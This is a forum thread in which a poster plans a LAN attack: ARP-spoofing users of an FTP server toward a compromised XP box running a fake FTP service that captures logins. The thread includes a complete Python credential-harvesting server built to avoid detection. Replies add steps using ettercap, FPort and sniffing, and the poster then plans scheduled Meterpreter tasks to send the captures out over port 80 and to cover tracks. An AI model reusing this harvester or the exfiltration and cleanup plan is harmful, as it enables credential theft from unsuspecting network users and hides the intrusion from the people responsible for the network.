Consider this scenario:
There are two hosts in the LAN. One is an FTP server and it has some interesting data which can be gained with the right FTP access; let's say it's a well-secured Linux-based OS. The other is an XP office box, and the attacker gained access and admin privileges on it remotely, controlling the host through the router that separates the LAN from the outer world.
The main idea, from the attacker's point of view, is to install the 'attacker controlled honeypot' on the XP box that is going to imitate the FTP server on the first box.
So, if the attacker succeeds in fooling the gateway into redirecting all traffic intended for the victim (the real FTP server box) to his pwned XP box, the FTP users will end up connecting to the box pwned by the remote attacker and give their username and password to the 'attacker controlled honeypot'.
I'm trying to make this setup in my virtual environment. There are a few things I'm not familiar with, and I will appreciate some tips. The 'honeypot' that has to be planted on the XP box could be a small program like, let's say, netcat, and then its output could be redirected wherever I want, but the honeypot's appearing screen should look like an FTP server screen, so I need some kind of 'honeypot-like', easy-to-set-up small program, or something like an msf module (if somebody has written something like this).
The other way, which is probably the right way, is to write a small program,
programming Winsock to act like an FTP server, store the data, exit on storing the pass buffer and stop the ARP spoofing process, so that the FTP user will be disconnected. And when he tries to connect again he will be redirected, I hope, to the real FTP server.
I must say that for now I don't have so much time for going into Winsock programming.
So if there is some kind of honeypot right for this purpose...
I hope that my scenario makes some sense, 'cause if I had time to go through it I would put it in my final exam at my university.
Every opinion on this is welcome.
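The 'Winsock FTP server' described in the post above, written as an added example in Python rather than Winsock (this is not the poster's code or any msf module). It speaks just enough of the FTP control protocol to make a client send USER and PASS, records the pair, and then answers with a 421 "service not available" so the client drops and retries later. Assumptions: the banner text is constructed, port 2121 is used for the demo instead of 21, and stopping the ARP spoof after the first capture is left to whatever scheduled the redirect.

```python
import socket
from typing import List, Optional, Tuple


class FtpHoneypot:
    """Fake FTP control channel that speaks just enough of RFC 959 to make a
    client send USER and PASS, records the pair, then asks to close."""

    # Constructed banner; the greeting of the real server could be copied here
    # so the client sees the same screen it expects.
    BANNER = "220 ProFTPD Server ready.\r\n"

    def __init__(self) -> None:
        self.captured: List[Tuple[str, str]] = []
        self._pending_user: Optional[str] = None

    def handle(self, line: str) -> Tuple[str, bool]:
        """Return (reply, close_after_reply) for one client command line."""
        cmd, _, arg = line.strip().partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            self._pending_user = arg
            return f"331 Password required for {arg}.\r\n", False
        if cmd == "PASS":
            if self._pending_user is None:
                return "503 Login with USER first.\r\n", False
            self.captured.append((self._pending_user, arg))
            self._pending_user = None
            # 421 tells the client the server went away, so it reconnects later;
            # by then the redirect should already have been removed.
            return "421 Service not available, closing control connection.\r\n", True
        if cmd == "QUIT":
            return "221 Goodbye.\r\n", True
        # Anything else before login gets the usual "log in first" reply.
        return "530 Please login with USER and PASS.\r\n", False


def run_session(client_lines: List[str]) -> Tuple[List[str], List[Tuple[str, str]]]:
    """Drive one honeypot session offline from a list of client commands.
    Returns every server reply (banner first) and the captured credentials."""
    hp = FtpHoneypot()
    replies = [FtpHoneypot.BANNER]
    for line in client_lines:
        reply, close = hp.handle(line)
        replies.append(reply)
        if close:
            break
    return replies, hp.captured


def serve_once(bind_addr: str = "0.0.0.0", port: int = 2121) -> List[Tuple[str, str]]:
    """Accept a single TCP client, run the honeypot against it and return what
    was captured. Port 2121 is an assumption for the demo; live it would be 21."""
    hp = FtpHoneypot()
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen(1)
        conn, _peer = srv.accept()
        with conn, conn.makefile("rb") as rd:
            conn.sendall(FtpHoneypot.BANNER.encode())
            for raw in rd:  # one CRLF-terminated command per iteration
                reply, close = hp.handle(raw.decode("latin-1"))
                conn.sendall(reply.encode())
                if close:
                    break
    return hp.captured


if __name__ == "__main__":
    # Offline dry run with constructed client input, then one live session
    # (serve_once blocks until a client such as `ftp 127.0.0.1 2121` connects).
    replies, creds = run_session(["USER alice", "PASS s3cret", "LIST"])
    print("".join(replies), creds)
    print(serve_once())
```

The client sees a normal banner and 331, hands over the password, and gets a 421, which most command-line FTP clients treat as a transient server problem rather than a wrong password.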
Nice idea, but way too overcomplicated. Simply ARP spoof them so you can read the FTP server's traffic (the passwords are plaintext).
Three-factor scenario (though you can load ettercap onto the box, and it would be easier):
1. Redirection to the XP box FTP service, however you want to do it.
2. Get a copy of FPort.exe (Foundstone - port redirection), set it up to bounce any connections to XP:FTP to Linux:FTP.
3. Start Wireshark.
It doesn't cover active FTP coming back, which could be a problem, but if the router is controlling, then it probably isn't and passive will be enough.
I agree with hitthemlow, just change the ARP tables and ettercap it.
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
Thanks for the replies.
Got the point, but I was thinking that this could be a quieter way: if you are able to automate the whole process, then you don't have to stay connected remotely and make some noisy traffic, examining the packets remotely or something.
What I had in mind is that the ARP spoof routine could be automated to run at a specific time of day or date, and the 'honeypot' could collect a 'bunch' of users and passwords, and then just send them all through port 80 to the attacker's box, or something like that. The problem is that this is going to be too noisy, 'cause the users would not be able to access the real FTP server then.
Which makes this even more complicated to set up the right way.
It's possible, but yes, it is way too overcomplicated, I see now.
The ARP spoof isn't going to deny them access; also, I can not think of a single legitimate use for this.
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
Also, what's wrong with exercising on different setups when we are talking about security? I'm trying to make this setup in my virtual environment.
And using BT, whose main page is called 'Offensive Security'.
Thanks again.
I guess this is a start: Security and Networking - Blog - Meterpreter Sniffer Module
Now we just need an ARP module.
I would rather be hated for what I am,
Than loved for what I am not.
cr1spyj0nes, exactly. That's a good start.
What I had in mind is that the Scheduleme Meterpreter script could be used, or the Schtaskabuse script, to transfer the capture.cap to the desired location.
Again, the Security and Networking - Blog - Abusing the Scheduler with Meterpreter post shows how to do it.
If I give up on implementing the 'honeypot', which was the main idea but not so efficient, then arpspoof can be scheduled too: uploading some arpspoof program and setting the start time using the msf schedule scripts.
Which gives me the idea that some cleanup-tracks scripts could be scheduled too.
Oh, msf is a fountain of opportunities.